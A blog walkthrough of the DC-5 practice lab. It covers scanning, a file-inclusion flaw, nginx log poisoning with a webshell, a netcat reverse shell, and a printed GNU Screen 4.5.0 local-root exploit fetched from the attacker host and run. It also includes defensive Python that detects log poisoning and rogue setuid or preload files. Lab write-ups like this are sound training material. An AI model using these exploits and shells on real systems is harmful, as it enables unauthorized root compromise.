Lluna's Pure land.

What is life like when singing to wine?


DC-5

0x00. Official description

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

But if you’re really, really stuck, you can watch this video which shows the first step.

0x01. As usual, start with nmap

We can see that .1 is the gateway, .2 is the host machine and .6 is Kali, so .4 must be our target.

root@JIYE:~/tmp/DC5# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 23:17 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0018s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00077s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.4
Host is up (0.00052s latency).
MAC Address: 00:0C:29:30:2B:A9 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds
root@JIYE:~/tmp/DC5#

0x02. Continue with nmap to scan services and ports

Ports 80, 111 and 40039 are found open.

root@JIYE:~/tmp/DC5# nmap -A 192.168.1.4 -p- -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 23:20 EDT
Nmap scan report for 192.168.1.4
Host is up (0.00047s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 40039/tcp status
| 100024 1 44947/tcp6 status
| 100024 1 46754/udp status
|_ 100024 1 51314/udp6 status
40039/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:30:2B:A9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds
root@JIYE:~/tmp/DC5#

0x03. Visit port 80

1. The first four pages are static; only Contact has a submission form.

2. Submit data

The form parameters are passed in the URL.

Removing the parameters and visiting again, the copyright line changes on every refresh.

3. Use Burp Suite to brute-force PHP files in the web root

Wordlist:

/usr/share/dirb/wordlists/big.txt

After the brute-force finishes, one extra file shows up: footer.

Visiting footer shows the copyright text, and it changes on every refresh, so we can conclude that a file inclusion exists.

0x04. Brute-force the include parameter

file is likely the parameter name.

Wordlists:

/usr/share/wordlists/dirb/common.txt

/usr/share/wfuzz/wordlist/vulns/dirTraversal-nix.txt

Testing confirms that file is the parameter.

0x05. Try remote file inclusion

It turns out remote file inclusion is not possible.

0x06. Local file inclusion

Since files cannot be uploaded, include the web server log file instead.

Since the server is nginx/1.6.2, the log file path can be brute-forced.

Here I simply searched Baidu for the common log file locations; in this lab the path is /var/log/nginx/access.log.

Write a small webshell into the log via Burp Suite

Upload successful.
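The log-poisoning route used above leaves its own traces in the same nginx access log. As an added example (not code from the original post), this Python scanner runs over constructed combined-format log lines and flags the inclusion probes (traversal, remote URL, log-path include) and the PHP tag that lands in the log through a header; the sample lines, the contact.php path and the rule names are my assumptions, not taken from the lab.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed nginx combined-format lines; they mimic the DC-5 file= inclusion
# and log-poisoning pattern, but every line here is made up for the example.
SAMPLE_LOG = """\
192.168.1.6 - - [23/Aug/2020:23:40:01 -0400] "GET /contact.php?firstname=a HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.6 - - [23/Aug/2020:23:42:02 -0400] "GET /contact.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
192.168.1.6 - - [23/Aug/2020:23:43:09 -0400] "GET /contact.php?file=http://192.168.1.6/x.txt HTTP/1.1" 500 91 "-" "Mozilla/5.0"
192.168.1.6 - - [23/Aug/2020:23:44:30 -0400] "GET / HTTP/1.1" 200 1234 "-" "<?php /* constructed marker */ ?>"
192.168.1.6 - - [23/Aug/2020:23:45:11 -0400] "GET /contact.php?file=/var/log/nginx/access.log HTTP/1.1" 200 99231 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
LOG_PATHS = ("/var/log/", "/proc/self/")  # classic include targets once a shell is in a log

def classify_value(value):
    """Rule names one query-parameter value triggers. parse_qsl already decoded the
    value once; decoding again catches double-encoded traversal (%252e%252e%252f)."""
    decoded = unquote(value)
    hits = []
    if "../" in decoded or "..\\" in decoded:
        hits.append("path_traversal")
    if SCHEME_RE.match(decoded):
        hits.append("remote_include_attempt")
    if decoded.startswith(LOG_PATHS):
        hits.append("log_file_include")
    return hits

def scan_access_log(text):
    """Return (line_number, rule, field_or_param) for every suspicious log line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these
        # A PHP open tag in any logged field is a poisoning attempt, whichever header carried it.
        for field in ("target", "referer", "ua"):
            if PHP_TAG_RE.search(m.group(field)):
                findings.append((n, "php_tag_in_log", field))
        for key, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
            for rule in classify_value(value):
                findings.append((n, rule, key))
    return findings
```

Feed it a real access.log with `scan_access_log(open(path).read())`; a `php_tag_in_log` hit followed by a `log_file_include` hit from the same client is the sequence this writeup describes.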

0x07. Connect to the shell with AntSword

0x08. Establish a stable shell with AntSword

Since the log file is constantly being read and written, create a stable webshell under /tmp and connect to that instead.

The 404 here is a decoy.

Visit

Connect

0x08. Reverse shell back to Kali

Since nc is available here, we can spawn a reverse shell.

Establish the connection

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.4] 38471
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

Establish an interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'              
www-data@dc-5:~/html$
www-data@dc-5:~/html$
www-data@dc-5:~/html$ whoami
whoami
www-data
www-data@dc-5:~/html$
www-data@dc-5:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@dc-5:~/html$ cd /
cd /
www-data@dc-5:/$

0x09. Privilege escalation

1. Try sudo -l

Not available.

www-data@dc-5:/$ sudo -l
sudo -l
bash: sudo: command not found
www-data@dc-5:/$

2. Check SUID binaries

screen-4.5.0 has the SUID bit set.

www-data@dc-5:/$ find / -perm /4000 2>dev/null
find / -perm /4000 2>dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
www-data@dc-5:/$

3. Check whether screen-4.5.0 is vulnerable

A local privilege escalation vulnerability exists.

root@JIYE:~# searchsploit screen 4.5.0
-------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
-------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@JIYE:~#

Upload the file

root@JIYE:~/tmp/DC5/screen_4.5.0# ls
41154.sh
root@JIYE:~/tmp/DC5/screen_4.5.0# cp 41154.sh /var/www/html/
root@JIYE:~/tmp/DC5/screen_4.5.0# systemctl start apache2
root@JIYE:~/tmp/DC5/screen_4.5.0#

www-data@dc-5:/tmp$wget http://192.168.1.6/41154.sh
converted 'http://192.168.1.6/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.1.6/41154.sh' (UTF-8)
--2020-08-25 00:57:32-- http://192.168.1.6/41154.sh
Connecting to 192.168.1.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1192 (1.2K) [text/x-sh]
Saving to: '41154.sh'

41154.sh 100%[=====================>] 1.16K --.-KB/s in 0s

2020-08-25 00:57:32 (350 MB/s) - '41154.sh' saved [1192/1192]

www-data@dc-5:/tmp$ ls
ls
41154.sh demo.php
www-data@dc-5:/tmp$

4. Add execute permission and run

It errors out... (the ^M after /bin/bash in the error shows the script has CRLF line endings)

www-data@dc-5:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@dc-5:/tmp$ ./41154.sh
./41154.sh
bash: ./41154.sh: /bin/bash^M: bad interpreter: No such file or directory
www-data@dc-5:/tmp$

Looking at the file, the script is a wrapper that compiles C code.

root@JIYE:~/tmp/DC5/screen_4.5.0# cat 41154.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshellroot@JIYE:~/tmp/DC5/screen_4.5.0#

Next, compile it locally

root@JIYE:~/tmp/DC5/screen_4.5.0# cat libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# cat rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# cat run.sh
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c
./libhax.c: In function ‘dropshell’:
./libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~
root@JIYE:~/tmp/DC5/screen_4.5.0# gcc -o ./rootshell ./rootshell.c
./rootshell.c: In function ‘main’:
./rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
./rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
./rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
./rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
./rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
./rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
root@JIYE:~/tmp/DC5/screen_4.5.0#
root@JIYE:~/tmp/DC5/screen_4.5.0# ls
41154.sh libhax.c libhax.so rootshell rootshell.c
root@JIYE:~/tmp/DC5/screen_4.5.0#

5. Run it

www-data@dc-5:/tmp$ wget http://192.168.1.6/run.sh
www-data@dc-5:/tmp$ wget http://192.168.1.6/rootshell
www-data@dc-5:/tmp$ wget http://192.168.1.6/libhax.so
www-data@dc-5:/tmp$ chmod +x run.sh
chmod +x run.sh
www-data@dc-5:/tmp$ ./run.sh
./run.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat /root/thisistheflag.txt


888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888




Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
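The escalation above depends on two host conditions: an out-of-baseline setuid binary (/bin/screen-4.5.0) and a writable, attacker-controlled /etc/ld.so.preload pointing into /tmp. As an added example (not code from the original post or the exploit), this Python audit checks both; the allowlist is built from the find output on this page, and build_demo_tree fabricates a throwaway directory tree standing in for a compromised root so the checks can run offline.

```python
import os
import stat
import tempfile

# Allowlist of setuid binaries from this page's find output; /bin/screen-4.5.0 is left out.
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/gpasswd", "/usr/bin/procmail",
    "/usr/bin/at", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/sbin/exim4", "/sbin/mount.nfs",
}

def unexpected_setuid(root="/", baseline=BASELINE):
    """Setuid regular files under root (reported relative to root) not in the allowlist."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: never follow symlinks while auditing
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                rel = "/" + os.path.relpath(path, root)
                if rel not in baseline:
                    found.append(rel)
    return sorted(found)

def ld_preload_issues(path="/etc/ld.so.preload"):
    """Flag the file being present at all, writable by group/others (the script's
    umask 000 leaves it 0666), or listing a library in a world-writable directory."""
    if not os.path.lexists(path):
        return []
    issues = ["present"]
    if os.lstat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("writable by non-owner")
    with open(path) as fh:
        for lib in (line.strip() for line in fh if line.strip()):
            if lib.startswith(("/tmp/", "/dev/shm/", "/var/tmp/")):
                issues.append(f"{lib}: library in world-writable directory")
    return issues

def build_demo_tree():
    # Constructed stand-in for a compromised root: two setuid files and a poisoned preload.
    root = tempfile.mkdtemp()
    for sub in ("bin", "etc"):
        os.makedirs(os.path.join(root, sub))
    for name in ("su", "screen-4.5.0"):
        open(os.path.join(root, "bin", name), "w").close()
        os.chmod(os.path.join(root, "bin", name), 0o4755)
    preload = os.path.join(root, "etc", "ld.so.preload")
    with open(preload, "w") as fh:
        fh.write("\n/tmp/libhax.so")  # same shape the script on this page writes
    os.chmod(preload, 0o666)
    return root
```

On a real host call `unexpected_setuid("/")` (or narrower roots such as /bin and /usr to skip /proc) and `ld_preload_issues()` with the default path; any output from either is worth an immediate look.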
------------- The paper is short but the feeling runs long; see you next time -------------